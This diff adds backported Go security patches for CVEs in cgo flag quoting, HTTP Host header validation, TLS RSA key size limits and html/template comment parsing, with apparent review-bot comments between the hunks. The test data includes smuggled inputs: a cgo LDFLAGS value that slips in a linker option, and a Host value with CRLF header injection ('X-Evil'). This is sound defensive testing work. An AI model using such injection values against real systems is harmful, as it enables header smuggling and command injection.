+diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+new file mode 100644
+index 0000000000000..4e91ae56505b6
+--- /dev/null
++++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+@@ -0,0 +1,20 @@
++# Test that #cgo LDFLAGS are properly quoted.
++# The #cgo LDFLAGS below should pass a string with spaces to -L,
++# as though searching a directory with a space in its name.
++# It should not pass --nosuchoption to the external linker.
++
++[!cgo] skip
++
++go build
++
++[!exec:gccgo] skip
++
++go build -compiler gccgo
++
++-- go.mod --
++module m
++-- cgo.go --
++package main
++// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
++import "C"
++func main() {}
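Review bot: The added `fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)` in the out.go hunk has two verbs and one argument, so with this patch alone each line is written with the flag in the key position and a missing-argument marker as the value. The rewritten loop in gccgo.go only accepts lines starting with `_CGO_LDFLAGS=`, so such lines would be skipped and the linker flags dropped. CVE-2023-29405-2.patch in this commit changes the call to `fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)`; the two files need to stay together and be applied in that order, and the recipe's patch list is not visible here to confirm it. Squashing them into one patch, or stating the dependency in this header, would make that explicit.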
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
new file mode 100644
index 0000000000..369eca581e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
+From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Tue, 6 Jun 2023 12:51:17 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
+
+For #60306
+For #60514
+
+Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+---
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+
+ src/cmd/cgo/out.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d0c6fe3d4c2c2..a48f52105628a 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+ for _, arg := range v {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
+ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
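Review bot: The `Upstream-Status`, `CVE` and `Signed-off-by` lines sit below the `---` separator in this patch header, and CVE-2023-29405-1.patch has the same layout, whereas the other patches in this commit place them above it. Text after `---` is not part of the commit message, so `git am` would drop the tags if the patch were ever imported that way. Moving the three lines above `---` in both files keeps the CVE tag attached to the change.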
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
new file mode 100644
index 0000000000..080def4682
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
+From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 28 Jun 2023 13:20:08 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
+ sending
+
+Verify that the Host header we send is valid.
+Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
+adding an X-Evil header to HTTP/1 requests.
+
+Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
+header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
+the header and will go into a retry loop when the server rejects it.
+CL 506995 adds the necessary validation to x/net/http2.
+
+Updates #60374
+Fixes #61075
+For CVE-2023-29406
+
+Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
+Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
+Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
+CVE: CVE-2023-29406
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/http_test.go | 29 ---------------------
+ src/net/http/request.go | 47 ++++++++--------------------------
+ src/net/http/request_test.go | 11 ++------
+ src/net/http/transport_test.go | 18 +++++++++++++
+ 4 files changed, 31 insertions(+), 74 deletions(-)
+
+diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
+index f4ea52d..ea38cb4 100644
+--- a/src/net/http/http_test.go
++++ b/src/net/http/http_test.go
+@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
+ }
+ }
+
+-func TestCleanHost(t *testing.T) {
+- tests := []struct {
+- in, want string
+- }{
+- {"www.google.com", "www.google.com"},
+- {"www.google.com foo", "www.google.com"},
+- {"www.google.com/foo", "www.google.com"},
+- {" first character is a space", ""},
+- {"[1::6]:8080", "[1::6]:8080"},
+-
+- // Punycode:
+- {"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
+- {"bücher.de", "xn--bcher-kva.de"},
+- {"bücher.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we convert to lowercase before punycode:
+- {"BÃœCHER.de", "xn--bcher-kva.de"},
+- {"BÃœCHER.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we normalize to NFC before punycode:
+- {"gophér.nfc", "xn--gophr-esa.nfc"}, // NFC input; no work needed
+- {"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
+- }
+- for _, tt := range tests {
+- got := cleanHost(tt.in)
+- if tt.want != got {
+- t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
+- }
+- }
+-}
+-
+ // Test that cmd/go doesn't link in the HTTP server.
+ //
+ // This catches accidental dependencies between the HTTP transport and
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index cb2edd2..2706300 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -18,7 +18,6 @@ import (
+ "io/ioutil"
+ "mime"
+ "mime/multipart"
+- "net"
+ "net/http/httptrace"
+ "net/textproto"
+ "net/url"
+@@ -26,7 +25,8 @@ import (
+ "strconv"
+ "strings"
+ "sync"
+-
++
++ "golang.org/x/net/http/httpguts"
+ "golang.org/x/net/idna"
+ )
+
+@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ // is not given, use the host from the request URL.
+ //
+ // Clean the host, in case it arrives with unexpected stuff in it.
+- host := cleanHost(r.Host)
++ host := r.Host
+ if host == "" {
+ if r.URL == nil {
+ return errMissingHost
+ }
+- host = cleanHost(r.URL.Host)
++ host = r.URL.Host
++ }
++ host, err = httpguts.PunycodeHostPort(host)
++ if err != nil {
++ return err
++ }
++ if !httpguts.ValidHostHeader(host) {
++ return errors.New("http: invalid Host header")
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
+ return idna.Lookup.ToASCII(v)
+ }
+
+-// cleanHost cleans up the host sent in request's Host header.
+-//
+-// It both strips anything after '/' or ' ', and puts the value
+-// into Punycode form, if necessary.
+-//
+-// Ideally we'd clean the Host header according to the spec:
+-// https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
+-// https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
+-// https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
+-// But practically, what we are trying to avoid is the situation in
+-// issue 11206, where a malformed Host header used in the proxy context
+-// would create a bad request. So it is enough to just truncate at the
+-// first offending character.
+-func cleanHost(in string) string {
+- if i := strings.IndexAny(in, " /"); i != -1 {
+- in = in[:i]
+- }
+- host, port, err := net.SplitHostPort(in)
+- if err != nil { // input was just a host
+- a, err := idnaASCII(in)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return a
+- }
+- a, err := idnaASCII(host)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return net.JoinHostPort(a, port)
+-}
+-
+ // removeZone removes IPv6 zone identifier from host.
+ // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
+ func removeZone(host string) string {
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 461d66e..0d417ff 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
+ }
+ req.Host = "foo.com with spaces"
+ req.URL.Host = "foo.com with spaces"
+- req.Write(logWrites{t, &got})
+- want := []string{
+- "GET /after HTTP/1.1\r\n",
+- "Host: foo.com\r\n",
+- "User-Agent: " + DefaultUserAgent + "\r\n",
+- "\r\n",
+- }
+- if !reflect.DeepEqual(got, want) {
+- t.Errorf("Writes = %q\n Want = %q", got, want)
++ if err := req.Write(logWrites{t, &got}); err == nil {
++ t.Errorf("Writing request with invalid Host: succeded, want error")
+ }
+ }
+
+diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
+index fa0c370..0afb6b9 100644
+--- a/src/net/http/transport_test.go
++++ b/src/net/http/transport_test.go
+@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
+ t.Error(err)
+ }
+ }
++
++func TestRequestSanitization(t *testing.T) {
++ setParallel(t)
++ defer afterTest(t)
++
++ ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
++ if h, ok := req.Header["X-Evil"]; ok {
++ t.Errorf("request has X-Evil header: %q", h)
++ }
++ })).ts
++ defer ts.Close()
++ req, _ := NewRequest("GET", ts.URL, nil)
++ req.Host = "go.dev\r\nX-Evil:evil"
++ resp, _ := ts.Client().Do(req)
++ if resp != nil {
++ resp.Body.Close()
++ }
++}
+--
+2.25.1
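Review bot: The context comment `// Clean the host, in case it arrives with unexpected stuff in it.` in the request.go hunk is left in place although the new code no longer cleans anything: `cleanHost` is removed and an invalid value now makes `write` return `http: invalid Host header`. I would reword it, for example `// Validate the host; a value that is not a valid Host header is rejected rather than truncated.` The body of `write` starts and ends outside the hunk. In the new `TestRequestSanitization` the error from `ts.Client().Do(req)` is discarded, so the test only shows that `X-Evil` did not reach the handler, not whether the request was refused.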
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
new file mode 100644
index 0000000000..637f46a537
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
+From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 19 Jul 2023 10:30:46 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
+ invalid Host headers
+
+Historically, the Transport has silently truncated invalid
+Host headers at the first '/' or ' ' character. CL 506996 changed
+this behavior to reject invalid Host headers entirely.
+Unfortunately, Docker appears to rely on the previous behavior.
+
+When sending a HTTP/1 request with an invalid Host, send an empty
+Host header. This is safer than truncation: If you care about the
+Host, then you should get the one you set; if you don't care,
+then an empty Host should be fine.
+
+Continue to fully validate Host headers sent to a proxy,
+since proxies generally can't productively forward requests
+without a Host.
+
+For #60374
+Fixes #61431
+Fixes #61825
+
+Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
+Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
+Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
+CVE: CVE-2023-29406
+Signed-off-by: Ming Liu <liu.ming50@gmail.com>
+---
+ src/net/http/request.go | 23 ++++++++++++++++++++++-
+ src/net/http/request_test.go | 17 ++++++++++++-----
+ 2 files changed, 34 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index 3100037386..91cb8a66b9 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ if err != nil {
+ return err
+ }
++ // Validate that the Host header is a valid header in general,
++ // but don't validate the host itself. This is sufficient to avoid
++ // header or request smuggling via the Host field.
++ // The server can (and will, if it's a net/http server) reject
++ // the request if it doesn't consider the host valid.
+ if !httpguts.ValidHostHeader(host) {
+- return errors.New("http: invalid Host header")
++ // Historically, we would truncate the Host header after '/' or ' '.
++ // Some users have relied on this truncation to convert a network
++ // address such as Unix domain socket path into a valid, ignored
++ // Host header (see https://go.dev/issue/61431).
++ //
++ // We don't preserve the truncation, because sending an altered
++ // header field opens a smuggling vector. Instead, zero out the
++ // Host header entirely if it isn't valid. (An empty Host is valid;
++ // see RFC 9112 Section 3.2.)
++ //
++ // Return an error if we're sending to a proxy, since the proxy
++ // probably can't do anything useful with an empty Host header.
++ if !usingProxy {
++ host = ""
++ } else {
++ return errors.New("http: invalid Host header")
++ }
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index fddc85d6a9..dd1e2dc2a1 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
+ }
+ }
+
+-func TestRequestBadHost(t *testing.T) {
++func TestRequestBadHostHeader(t *testing.T) {
+ got := []string{}
+ req, err := NewRequest("GET", "http://foo/after", nil)
+ if err != nil {
+ t.Fatal(err)
+ }
+- req.Host = "foo.com with spaces"
+- req.URL.Host = "foo.com with spaces"
+- if err := req.Write(logWrites{t, &got}); err == nil {
+- t.Errorf("Writing request with invalid Host: succeded, want error")
++ req.Host = "foo.com\nnewline"
++ req.URL.Host = "foo.com\nnewline"
++ req.Write(logWrites{t, &got})
++ want := []string{
++ "GET /after HTTP/1.1\r\n",
++ "Host: \r\n",
++ "User-Agent: " + DefaultUserAgent + "\r\n",
++ "\r\n",
++ }
++ if !reflect.DeepEqual(got, want) {
++ t.Errorf("Writes = %q\n Want = %q", got, want)
+ }
+ }
+
+--
+2.34.1
+
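Review bot: The rewritten `TestRequestBadHostHeader` exercises only the non-proxy path through `req.Write`, so the `usingProxy` branch that must still return `http: invalid Host header` has no coverage in this hunk. A second check through the proxy form, placed after the existing comparison, would pin it, e.g. `if err := req.WriteProxy(logWrites{t, &got}); err == nil { t.Errorf("WriteProxy with invalid Host succeeded, want error") }`. The return value of `req.Write` is also ignored now; checking that it is nil would confirm that blanking the Host is the only effect on the direct path.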
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
+From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 7 Jun 2023 15:27:13 -0700
+Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
+ certificates to <= 8192 bits
+
+Extremely large RSA keys in certificate chains can cause a client/server
+to expend significant CPU time verifying signatures. Limit this by
+restricting the size of RSA keys transmitted during handshakes to <=
+8192 bits.
+
+Based on a survey of publicly trusted RSA keys, there are currently only
+three certificates in circulation with keys larger than this, and all
+three appear to be test certificates that are not actively deployed. It
+is possible there are larger keys in use in private PKIs, but we target
+the web PKI, so causing breakage here in the interests of increasing the
+default safety of users of crypto/tls seems reasonable.
+
+Thanks to Mateusz Poliwczak for reporting this issue.
+
+Updates #61460
+Fixes #61579
+Fixes CVE-2023-29409
+
+Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
+Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
+Run-TryBot: David Chase <drchase@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Bypass: David Chase <drchase@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
+CVE: CVE-2023-29409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/tls/handshake_client.go | 8 +++
+ src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
+ src/crypto/tls/handshake_server.go | 4 ++
+ 3 files changed, 90 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
+index 4fb528c..ba33ea1 100644
+--- a/src/crypto/tls/handshake_client.go
++++ b/src/crypto/tls/handshake_client.go
+@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
+ return nil
+ }
+
++// maxRSAKeySize is the maximum RSA key size in bits that we are willing
++// to verify the signatures of during a TLS handshake.
++const maxRSAKeySize = 8192
++
+ // verifyServerCertificate parses and verifies the provided chain, setting
+ // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
+ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse certificate from server: " + err.Error())
+ }
++ if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ certs[i] = cert
+ }
+
+diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
+index 6bd3c37..8d20b2b 100644
+--- a/src/crypto/tls/handshake_client_test.go
++++ b/src/crypto/tls/handshake_client_test.go
+@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
+ t.Errorf("Error expected, but no error returned")
+ }
+ }
++
++// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
++type discardConn struct {
++ net.Conn
++}
++
++func (dc *discardConn) Write(data []byte) (int, error) {
++ return len(data), nil
++}
++
++// largeRSAKeyCertPEM contains a 8193 bit RSA key
++const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
++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
++u58=
++-----END CERTIFICATE-----`
++
++func TestHandshakeRSATooBig(t *testing.T) {
++ testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
++
++ c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
++
++ expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
++ err := c.verifyServerCertificate([][]byte{testCert.Bytes})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
++ }
++
++ expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
++ err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
++ }
++}
+diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
+index b16415a..2e36840 100644
+--- a/src/crypto/tls/handshake_server.go
++++ b/src/crypto/tls/handshake_server.go
+@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse client certificate: " + err.Error())
+ }
++ if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ }
+
+ if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
+--
+2.25.1
+
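Review bot: The size checks added to `verifyServerCertificate` (handshake_client.go) and `processCertsFromClient` (handshake_server.go) use a single-value type assertion, `cert.PublicKey.(*rsa.PublicKey)`, on a certificate supplied by the peer, and that form panics if the value ever has a different type. It is safe only while the x509 parser always pairs `x509.RSA` with `*rsa.PublicKey`, which this patch does not show. The comma-ok form keeps the limit and drops that dependency: `if pub, ok := cert.PublicKey.(*rsa.PublicKey); ok && pub.N.BitLen() > maxRSAKeySize {`. In `TestHandshakeRSATooBig` the block returned by `pem.Decode` is used without a nil check, so a damaged PEM constant would show up as a nil dereference rather than a clear test failure. Both handshake functions continue outside their hunks.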
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
+From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:24:13 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
+ comments in script contexts
+
+Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
+comments in script contexts. Also per section 12.5, support hashbang
+comments. This brings our parsing in-line with how browsers treat these
+comment types.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62196
+Fixes #62395
+Fixes CVE-2023-39318
+
+Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
